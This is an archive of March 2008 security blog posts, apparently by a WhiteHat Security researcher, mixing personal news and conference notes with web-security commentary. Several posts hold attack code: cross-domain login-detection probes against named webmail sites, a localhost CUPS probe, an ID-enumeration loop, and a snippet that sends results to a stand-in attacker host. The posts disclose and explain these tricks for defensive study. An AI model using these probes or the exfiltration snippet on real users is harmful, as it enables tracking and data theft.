Sunday, March 30, 2008

Brazilian Jiu-Jitsu Rulez!

Still loving Brazilian Jiu-Jitsu training, and I’ve mixed in some standup to build MMA experience. I’d strike more often, but considering all the public speaking I do, it probably wouldn’t be a good idea to show up on stage with a black eye or worse. *Amazing that hasn't happened already.* Still, pure BJJ is extremely physically demanding and at the same time incredibly cerebral. Skill, and by extension belt level, takes forever to increase. For example, 3 years in I’m still only a blue belt, one up from white, but I have high hopes of earning purple this summer. My 5-year-old girl also comes with me all the time so she can learn the moves. Let me tell you, if you let her take your back, she WILL tap you with a rear choke, and don’t even mess with the arm bars from the mount. Makes a father proud. :)

As most reading here know, I travel quite extensively, which makes a weekly BJJ schedule difficult to maintain. So instead of stopping periodically, I decided to travel with my Gi everywhere I go. Over the last few months I’ve trained in about two dozen academies across California, Hawaii, Florida, Texas, New York, Wisconsin, and probably some others I’m forgetting. At every academy I’ve visited the instructors are really cool and experienced, each with different strengths and weaknesses, but most importantly they have chill students and big egos are rare. What surprised me the most is the varying styles. When I first started grappling I simply didn’t appreciate or even notice the subtle differences that I do now.

When I train at other schools I do my best to refrain from tapping people with higher belts than me because of, well, let’s just say I had a bad incident. However, under no circumstances am I to get tapped by anyone, let alone someone of the same belt level or lower. My instructor gets really emotional about that sort of thing. :) I'm proud to say that I hold my own with any blue belt, or even purple for that matter, and hope to prove it in competition soon. The few times I’ve had the opportunity to train with a brown belt I get my ass kicked bad, embarrassingly so. While I enjoy developing my skill, my weight is always on my mind because I want to enter a tournament. I started BJJ at 300lbs (136kg) and needed to get down to 221lbs (100kg) to enter the super heavyweight class.

Currently I’m hovering at about 240lbs; the last couple of months of weight loss has been painfully slow, even though I'm noticeably thinner. That’s probably because I’ve focused more on fat loss and muscle gain to be stronger and faster, with more stamina. One thing I’ve learned is that most people can only physically train 2-3 hours of BJJ a day at the most, because after that the body just can’t take any more. This is quite different from what I’m used to in technology, where I can burn 12-14 hours a day, week in and week out, until I master a given subject. In BJJ this is simply not the case, so when you are in the gym you’d better make the most of it. I did find that cross-training helps tremendously for fitness on the mat. While my BJJ muscles scream in pain, I can usually still weight lift, run, stretch, swim, or do something else with only moderate discomfort.

Aussie Rules Football season is right around the corner, so I have to make sure my running stamina is ready to go.

InfoSec Conferences Abound

Every infosec conference has something different to offer and is of value depending on what you are into. Some people enjoy the talks and the expert speakers, others like learning about the vendors’ latest warez, while still others take advantage of events taking place close to home if travel isn’t an option. So while many of us are gearing up during the final week before RSA, here are some other conferences definitely worth a look.

TRISC
The Texas Regional Infrastructure Security Conference takes place in San Antonio. I went last year and had a really good time, but can’t attend this time around since I’m scheduled to be at InfoSec World 2008 in London. TRISC's talks favor the business side over super-deep tech, which makes it ideal for IT professionals with a casual security background. The agenda has some top webappsec talent lined up and I’ve personally seen them all present. Good guys with engaging material. Texas local RSnake is making the drive from Austin, and WhiteHat’s own Trey Ford will be carrying our flag.
  • Why I don’t use web-app scanners ... all the time. - Robert Hansen
  • Top Website Vulnerabilities: Trends, Business Effects, How to Fight Them - Trey Ford
  • Black Box Vs. White Box: App Testing Strategies - John Dickson
  • Securing the SDLC: A Case Study - Dan Cornell

ToorCon Seattle
Man, I haven’t had the chance to get back to ToorCon in years and I really miss it. It’s deeply technical, has the latest content, solid speakers, cool events, and a laid-back, fun style. ToorCon is a lot like Defcon was years back, before it got HUGE. Of course my schedule is too crazy as usual: I’ll be in Dubai at HiTB during the conference, so I won’t be able to make it. Though I do see a lot of excellent speakers listed on the agenda, which is essential for any good show. If you are in the area or have the means to travel, you’ll definitely have a good time.


InfoSec World 2008 (London)
I’ve only just started really experiencing MISTI’s InfoSec World shows, the first being the 2008 one in Orlando just a little while ago, where I had a great time mixing with the attendees and hanging out with several familiar faces. InfoSec World had plenty of sponsors, so the venue and the amenities were stellar all around. Catered parties, free booze and snacks, yum. ;) The hotel itself was crazy nice; even the taxis were black SUVs. How similar this is to Europe I have no idea, but I’m looking forward to the trip and finding out. If anyone reading this is going to be around for the show, please let me know.

Friday, March 21, 2008

SANS - WhatWorks in Web Application Security Summit 2008 (Las Vegas)

I’ve probably been to over 50 IT security events/conferences in the last 18 months, precious few being completely dedicated to web application security -- the last being AppSec 2007. While AppSec was awesome, what many asked for next was an environment set up to discuss battlefield-tested strategies and tactics that REALLY work. For example, “What are the best ways to identify vulnerabilities, remediate them, and prevent them from occurring (SDL)?” “What about PCI compliance?” “Products vs. services?” That’s where the SANS "WhatWorks in Web Application Security Summit 2008" (June 1-2, 2008 - Las Vegas, NV) comes in, and why WASC has been helping organize the event. I went to the first one in Washington D.C. and really enjoyed myself.

The event will NOT be dominated by vendor speakers subtly driving people towards self-serving solutions. In fact, there are only four "expert briefings" and two "vendor panels" during the entire two-day, single-track session. The bulk of the agenda is "user panels" involving real people sharing their experiences on how they defend their websites and ensure secure code. These are people who've been there and done it, who've looked at and tried everything, and have the experience to know what works and what doesn't. Attendees are from financial services, retail, healthcare, insurance, and other industries, filling a broad range of IT security roles. People are encouraged, if not expected, to ask questions and get the information they need.

Of course no conference would be complete without some top names in the industry. So we have Robert “RSnake” Hansen (SecTheory), Caleb Sima (Chief Technologist - Security at HP Software), Gary McGraw (CTO of Cigital), and yours truly on the docket. After all the vendor stuff is cleared post-RSA, I’ll be looking forward to this event. Plus, I’ve never stayed at the Paris hotel, so that should be cool. Viva Las Vegas!

Thursday, March 20, 2008

Unsolved Problems

Many people probably do something similar, but for years I’ve kept a running list of unsolved technology problems that I’ve come across -- typically specific things I’d like to build, design, or break. As it applies to Web security, some are potential hacks, defense measures, or conceptual designs, mostly regarding Web browsers and websites. The list serves as a nice in-flight activity as opposed to crossword puzzles, some items being more compelling to work on than others. When I post some little trick here it usually comes off this list, yet the list always seems to grow instead of shrink. ;)

Anyway, I thought it might be interesting for others to see several of the things currently on my list. See below.

What unsolved Web security problems are you working on?

Unsolved Problems:
- Create a better CAPTCHA that scores better on the Effectiveness Test than the current image version everyone hates
- Develop a CSRF defensive measure that’s effective in the presence of an XSS vulnerability on the same target domain
- Obtain a user’s NAT'ed IP address using ONLY HTML/JavaScript
- Send a valid XML web services request cross-domain in a browser using only HTML/JavaScript. Do not use any of the new FF cross-domain features, as the target server should not need to opt-in.
- Design a conceptual replacement for the Web browser same-origin policy that addresses its deficiencies
- Find a way to SCRIPT SRC, or otherwise include within the DOM, a JSON feed wrapped using curly braces (illustrated below)
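
For context on that last one, here’s a rough illustration (my own sketch, not a solution) of why brace-wrapped JSON is so hard to steal cross-domain:

// A cross-domain <script src="http://target/feed.json"> evaluates the
// response body as script. If that body is a brace-wrapped JSON object:
//
//   {"secret": "hunter2"}
//
// the opening brace parses as a block statement and the string-literal
// "label" is a SyntaxError -- and even variants that do parse just
// evaluate and discard the value. Unlike the classic JSON-array hijack
// (overriding the Array constructor in older Firefox), there is no
// constructor hook or global side effect for the including page to
// intercept:
try {
  eval('{"secret": "hunter2"}');  // the same parse the browser performs
} catch (e) {
  alert(e.name);  // "SyntaxError" -- the data stays sealed
}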

Wednesday, March 19, 2008

Fun with CUPS

This week Apple released a large set of patches; one that caught my eye was for CUPS. For those unfamiliar, the Common UNIX Printing System provides a portable printing layer for UNIX®-based operating systems AND listens on localhost port 631 (http). Check if you have it running (http://localhost:631/). HAH! No Firefox port blocking. :) According to the various advisory links, there was some kind of heap overflow exploitable through a CGI.

I thought that was really interesting since CUPS is currently running on my MacBook Pro, I believe ever since I set up a printer. I’m fairly certain this is standard OS X behavior. Kurt Grutzmacher shared this info with me a long while back (after the intranet hacking talks) and we tried to locate a single XSS issue on the Web interface. If we had been successful (we weren't), it would have made for a really nasty way to pull a list of someone’s completed print jobs (and maybe a little more). Maybe DNS rebinding would do the trick?

Anyway, while I don’t know or have the exact HTTP request that would cause the overflow, it sounds technically possible that it could be exploited simply by having the victim visit a random malicious web page. And there seems to be a lot of that sort of thing going on these days. To borrow the login detection trick from earlier, here's a quick way to tell if a user is running CUPS.
<* img src="http://localhost:631/images/navbar.gif" onload="alert('CUPS is listening')" onerror="alert('No CUPS')">

Tuesday, March 18, 2008

Attacks, Attacks, and More Attacks

So many attacks are flying around that I’m unable to follow them all, let alone post a story on each. There are a few I wanted to draw attention to, though.

McAfee reported that an estimated 10K – 20K web pages (most running ASP) were laced with a malicious JavaScript iframe that infects visitors with a password-stealing Trojan targeting popular online games. The event was very similar to the Dolphin Stadium hack from way back during the Super Bowl. From the reports I couldn’t immediately discern how the compromise originally took place.

Now there seems to be another mass attack, this time affecting 200K pages, most running phpBB. Wow.

Next we got reports of a “Major Flaw In Pennsylvania Online Voter Registration.” Careful pressing the Digg link; it’ll download someone’s voter registration card. Check out the comments below it and you’ll get the idea. Basically it’s a simple URL number rotation hack. Score one for insufficient authorization and a whole bunch of other oversights.
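
To illustrate the class of flaw (hypothetical host and ID range, not the actual site), a URL number rotation hack is nothing more than incrementing a predictable identifier that the server never bothers to authorize:

// Hypothetical example of insufficient authorization via predictable IDs.
// If records are served at .../card?id=<number> with no ownership check,
// walking the ID space retrieves other people's documents:
for (var id = 1000; id <= 1010; id++) {
  // each URL below would return someone else's registration card
  var url = "http://vulnerable-site.example/card?id=" + id;
  document.write('<a href="' + url + '">' + url + '</a><br>');
}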

Lastly, check this out: “Close to 70 Massachusetts banks have been contacted by Visa and MasterCard,” having potentially “exposed hundreds of thousands of consumers in the northeastern U.S.” The smart money says an ASV might have gotten 0wN3ed.

Monday, March 17, 2008

WASC RSA Meet-Up 2008!

For those attending the RSA Conference (San Francisco / April 7 – 11) who want to eat, drink, and be merry with everyone in the webappsec community, the WASC meet-up is the place to be. Last year’s event rocked (60 - 70 people showed), so we figured this time we’d better get a sponsor to pay for all the food & drinks. :) WASC meet-ups are a great opportunity to see people we otherwise only communicate with virtually. Of course there will be a lot of familiar faces in the crowd. Everyone is welcome, but space is extremely limited, so RSVP if you plan to attend by email: michael.edwards -AT - whitehatsec.com

Place:
Jillian's @ Metreon
(Walking distance from the conference)

101 4th Street, Suite 170
San Francisco, CA 94103
Phone: 415.369.6100

Time: Wed, April 9 @ 12:00pm - 2:00pm

VA + WAF, yes it really works!

Over the last week I’ve been inundated with people interested in WhiteHat Security’s new partnership with F5, specifically the integration between Sentinel and their web application firewall (ASM). This is where we identify vulnerabilities, send custom rules to their WAF, and customers mitigate issues with the push of a button. It was actually Arian Evans (Director of Operations) who reminded me what this means for WhiteHat as a company when he recalled a conversation he had with Bill Pennington (VP of Services) and myself upon first joining the team. The question on the table was, “What is the most compelling story WhiteHat could ever tell?”

After a long conversation loaded with acronyms and buzzwords, the consensus was simple: “find and fix.” That is, finding vulnerabilities on websites and fixing them on an INTERNET-WIDE scale. Only a year and a half ago few outside company walls believed we could pull off the first part, let alone the second. Today we’re well on our way to accomplishing exactly that, and even our staunchest critics have come around. Now partnered with F5, whose claim to fame is performance and load balancers, we’re ambitiously taking the next step. Imagine having the time to take care of vulnerabilities in the source code when and how you choose. Imagine being a security guy with control over the security of your website(s).

Many are curious as to how we plan to succeed with the VA+WAF concept where others in the past have failed. The answer is twofold. Today’s WAF products are far more technologically mature than in years past, but the most important part is that we’re able to fill the biggest missing piece -- accurate vulnerability data. Commercial scanning vendors proved time and time again that dumping hundreds or even thousands of unvalidated results loaded with false positives and duplicate vulnerabilities into a WAF just doesn’t work. By contrast, with people, process, and a lot of technology, we’ve overcome that hurdle. WAFs can now become easy to set up, easy to manage, and best of all, capable of blocking attacks attempting to exploit known vulnerabilities (a rarity).

Bill had the same impression as I did when first seeing the technology work; in a word, “amazing.” The VA+WAF combination resonates with everyone we share it with -- media, analysts, experts, IT professionals, you name it. Can you tell I’m excited? ;) The integration will also speak volumes for PCI 6.6, as a way for organizations to meet their obligations quickly and effectively. In a few short weeks the RSA Conference will be the first place we’ll have a demo on public display. Everyone is welcome to stop by the booth and see it for themselves. I can’t wait!

Tuesday, March 11, 2008

Login Detection, whose problem is it?

There are several different ways JavaScript malware can tell if a user is logged in to a particular website. I’d like to demonstrate a couple of them; RSnake and I have talked about variances of these before. We’ll be using GMail, Yahoo Mail, and ha.ckers.org as guinea pigs. The tricks leverage CSRF and authenticated content (well-formed HTML or images) with predictable URLs. I spent a few minutes on each WebMail system locating URLs that respond differently depending on whether the user is logged in or not.

1) https://mail.google.com/mail/pimages/2/icons_ns1.png
2) http://us.mg1.mail.yahoo.com/dc/rs?log=SuccessfulLaunch
3) http://ha.ckers.org/blog/wp-admin/images/toggle.gif

I’m sure similar URLs can be found on almost any website with user accounts. The GMail URL responds with an image when the user is logged in and HTML when they’re not. The YahooMail URL responds with just a simple HTML comment when logged in, or a large HTML error page when not. The ha.ckers.org URL will only be served if you are logged in as an admin on WordPress; otherwise a forbidden message appears.

The ways the URLs respond are subtly different and require slightly different approaches when applied to Firefox 3 (b3), as we’ll see next.

For GMail it’s extremely simple.

<* img src="https://mail.google.com/mail/pimages/2/icons_ns1.png" onload="alert('GMail: Logged-In')" onerror="alert('Gmail: Not Logged-in')">

The IMG tag’s onload event handler fires if a valid image returns, while the onerror event handler fires on invalid images (for example, when HTML is returned). Easy boolean logic. Of course additional code is required to send the results back to the server, but that’s beyond our scope here.
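
That said, a minimal sketch of one common approach (assuming an attacker-controlled logging host, shown here as a hypothetical evil.example):

// Smuggle the finding cross-domain inside an image request; no response
// is needed since the query string alone carries the data.
function reportResult(result) {
  new Image().src = "http://evil.example/log?r=" + encodeURIComponent(result);
}
// e.g. replace the alert() calls in the examples with:
//   onload="reportResult('GMail: Logged-In')"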

The ha.ckers.org check is exactly the same as GMail’s.

<* img src="http://ha.ckers.org/blog/wp-admin/images/toggle.gif" onload="alert('RSnake: Logged-In')" onerror="alert('RSnake: Not Logged-in')">


The YahooMail example is almost as simple, but has to be implemented a little differently since we’re dealing with only HTML responses and no images.

<* script src="http://us.mg1.mail.yahoo.com/dc/rs?log=SuccessfulLaunch" onload="alert('YahooMail: Logged-in')" onerror="alert('YahooMail: Not Logged-in')">


The SCRIPT tag’s onload event handler fires if the response is the simple HTML comment, which is valid E4X syntax, while the onerror event handler fires when encountering the HTML error page, which obviously causes the JavaScript interpreter to fail.

Website owners can do one of two things here:

1. Remove authentication from the resource if the content isn’t particularly sensitive
2. Add CSRF-like secret tokens so that the URL is not predictable (a sketch of this option follows below)
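
As a rough sketch of the second option (my illustration, with made-up names): the site binds a random token to the user’s session at login and appends it to otherwise-predictable resource URLs, so cross-domain probes can no longer guess them.

// Illustrative only: generate an unguessable per-session token.
// A real implementation must use a cryptographically strong RNG,
// not Math.random().
function makeResourceToken() {
  var hex = "0123456789abcdef", token = "";
  for (var i = 0; i < 32; i++) {
    token += hex.charAt(Math.floor(Math.random() * 16));
  }
  return token;
}

// The authenticated resource then lives at an unpredictable URL, e.g.
//   https://mail.example.com/pimages/icons.png?t=3f9a...
// and the server refuses to serve it when the token doesn't match the session.
var exampleUrl = "https://mail.example.com/pimages/icons.png?t=" + makeResourceToken();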

At the end of the day, though, it’s unlikely that any of these websites, or others with similar issues, will take either step. Even if they did, there are so many other ways to pull off the same attack (timing attacks, monitoring onload events, probing for named iframes, JS console errors, etc.) that the value is somewhat limited. I had a long discussion with Chris Evans and Rich Cannings from Google about this particular issue to get their insights.

In our collective opinion, it’s probably not the responsibility of the website owners to change their (arguably secure) application behavior to compensate for the browser leaking cross-domain information. Though they still could if they really wanted to. Also, it’s probably a lot easier for the browser vendors to remedy this issue in some clever way than for every website owner to do the above. What do you think?

Sunday, March 09, 2008

Website Security Strategies that Work

Inside an enterprise lives an IT security professional responsible for website security. He takes his job seriously, because if his employer’s websites get hacked, he gets the late-night call from the boss. A big part of the job requires educating developers on the importance of secure coding and informing the business owners of Web security risks. He does this because no amount of patching or firewalling will fend off an attacker with a browser. Yet while doing everything within his power, he still has a total lack of control in protecting the websites he’s responsible for: he can’t fix the vulnerabilities in his website(s) when they’re found without developer involvement.

Does this situation sound familiar? I hear the frustration all the time. The problem is that when a vulnerability is identified, whether by a pen-tester, developer, outsider, or whomever, these are the sole and painful options:

1. Take the website down
2. Revert to an older version of the website/code (if it’s secure)
3. Stay up while exposed

Nothing is better than not having an issue in the first place, but vulnerabilities will crop up despite the best software development lifecycle. Option #1 is typically reserved for occasions where an incident has occurred, and option #2 for when a product hot-fix is not back-ported to development, which later gets overwritten. So far history shows the vast majority choose option #3 and assume the risk rather than halt business, with fixes coming a ways off.

Clearly we need more options - something that allows the mitigation of vulnerabilities without having an impact on business operations.

This is important because 9 out of 10 (or more) websites have vulnerabilities as a result of being built by those who didn’t know about or appreciate the severity of today’s attacks. Furthermore, I’d say most of the popular ecommerce websites were built either before the discovery of prevalent vulnerability classes such as XSS, SQL Injection, and CSRF, or prior to them becoming common knowledge. Consequently we’re burdened by 15 years of insecure website code already in circulation, and it’s extremely unlikely that code will be rewritten solely for “security reasons.” Over the coming decade its replacement will occur naturally to achieve business goals while taking advantage of emerging technologies and more secure development frameworks.

That means when you take an honest look at website security, there must be two different, but equal, strategies:

1) Security throughout the SDLC
2) Vulnerability Assessment + Web Application Firewall

Strategy #1 works best for websites soon to be built or undergoing a major rewrite/addition. A Web security program combining executive buy-in, modern development frameworks, awareness training, and security baked into design and QA simply does wonders. On the other hand, this strategy is often difficult and expensive to implement on an existing website where no such activity took place historically. Even after vulnerabilities are identified, it’s time-consuming to allocate personnel, QA/regression test the fix, and schedule production releases. No matter how mature the SDLC, it takes at least days, sometimes weeks, and even months for issues to be resolved. This is where most are today. It will also really challenge true PCI 6.6 compliance once the burden is realized.

That’s why strategy #2 works best for existing websites: a technology integration by which vulnerability assessment results are immediately imported into a WAF, creating a “virtual patch.” The integration closes the loop between vulnerability identification and mitigation, allowing the opportunity to address root causes as time and budgets allow. The challenge here is that if the vulnerability data source is inaccurate, the virtual patches may cause the WAF to deny valid traffic, allow malicious traffic, or crash entirely. With verified data, the enterprise is able to fully realize its vulnerability assessment investment in real time, confidently place WAFs in blocking mode, and provide IT professionals with the control they’ve always lacked. And it would be about time too!
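
To make the “virtual patch” idea concrete, here’s a purely hypothetical rule (my own notation, not F5 ASM’s actual policy language) of the kind a verified finding could generate:

// Hypothetical virtual patch, illustration only. The key property is that
// the rule is scoped to one verified vulnerability, so the WAF can block
// confidently without disturbing legitimate traffic elsewhere on the site.
var virtualPatch = {
  findingId: "WH-EXAMPLE-0042",                    // made-up identifier
  location: { path: "/search.cgi", parameter: "q" },
  vulnerabilityClass: "Cross-Site Scripting",
  action: "block",
  // deny parameter values containing the markup the verified exploit required
  denyPattern: /<\s*script|javascript\s*:|on\w+\s*=/i
};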

If this solution sounds familiar, that’s because the idea has been used successfully in the past, just never in web application security. Kavado tried in the 2002-2003 era; in 2003-2004 several more vendors made attempts using AVDL; and I’m sure there were others, but ultimately all attempts proved unsuccessful for the reasons above. Only recently have vulnerability scanning and web application firewall technology matured to the point where the combined approach has finally become viable. As the current state of Web security is being realized and business decisions need to be made, having a variety of options available is a great, great thing.

Friday, March 07, 2008

100% secure websites

I think we can all agree that 100% security is impossible; even when adding layer upon layer of defenses, systems will eventually fail. Furthermore, too much emphasis on obtaining “perfect” security results in diminishing returns. When you get right down to it, though, what we’re really trying to do is keep the bad guys from compromising our websites, and that doesn’t necessarily require 100% security. The challenge is finding the right balance between the resources put in (time/money) and adequately reducing (not eliminating) the likelihood of getting hacked. Still, people often mistakenly try to accomplish one by doing the other.

From my experience in website security there are two predominant types of “bad guys”: troublemakers and the financially motivated. Troublemakers, I’ve found, are the most difficult to defend against. They’ll often spend an extraordinary amount of effort (days, weeks, months, and sometimes years) to pull off a defacement, achieve administrative-level access, cheat at a game, alert(‘xss’), disrupt the user experience, and so on. To successfully defend against a troublemaker you must have perfect security all the time (impossible), while they just have to exploit one issue. Fortunately, the results of their antics are unlikely to cause substantive reputation or financial loss; mostly they’ll just annoy you and waste time.

Interestingly, the financially motivated, the ones we really have to worry about, are easier to deal with since they conform to an ROI model. Financially motivated bad guys follow the path of least resistance by targeting the softer and more potentially lucrative websites. They’re after credit card numbers, social security numbers, passwords, and other forms of useful sensitive information -- whatever will help them pull off a fraudulent transaction. They might spend as much as a couple of days on sweeping attacks, or a few weeks on targeted attacks if the reward looks promising, but probably no more, as other websites would prove easier. So if your website is too hard to hack, the bad guys will move on, probably to your competitors/peers.

There’s a funny joke that lends context:

Two guys are hiking and suddenly a bear starts chasing them...
The first guy says, “Are you crazy!? We can’t outrun a bear!”
The second guy says, "I don't have to outrun the bear... I only have to outrun you!"

(In Hawaii we have a similar variant with surfers and sharks.)

The challenge in website security is knowing exactly how fast the bear and the other guy are, plus they tend to get faster over time. WhiteHat Security plans to release some statistics around this area soon. Apart from that, a good rule of thumb is that if XSS, SQLi, and a few other attack classes can be found in your website within a few minutes/hours, then it’s probably one of the masses playing Russian Roulette.